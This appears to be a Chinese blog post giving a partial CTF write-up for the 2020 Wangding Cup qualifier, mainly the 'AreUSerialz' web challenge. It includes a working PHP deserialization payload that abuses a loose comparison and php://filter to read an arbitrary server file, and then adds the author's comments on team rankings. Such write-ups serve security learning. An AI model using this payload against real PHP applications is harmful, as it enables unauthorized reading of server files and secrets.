2020网鼎杯预选赛部分WP

咋说呢,看起来是凉了。。。

Web

AreUSerialz

这题观察可以发现前后比较op的php指令有区别,一个是==,一个是===,所以可以用数字绕过;我们有了文件读取后先读取/proc/self/cmdline,然后再读取配置文件分析可以得到/web这个目录,然后我们直接base64读取绝对地址的文件即可。

payload:

1
/?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:67:"php://filter/read=convert.base64-encode/resource=/web/html/flag.php";s:7:"content";N;}

Misc

Weclome~!

看图猜战队,然后我们F12调整到Console里面拿到flag。

感想

严格来说我就做出来两题。我们队(Lilac2队)出了9个题,but最后几分钟一下子掉了很多名,刚好卡到130后面,前面如果没有足够的封号队就凉了。,前面封号队还真有不少,估计是进了。

恭喜1队进入线下半决赛~

不如去做项目讲课恰烂钱


2020网鼎杯预选赛部分WP
http://hexo.init-new-world.com/2020-wang-ding-bei-yu-xuan-sai-bu-fen-WP
Author
John Doe
Posted on
May 11, 2020
Licensed under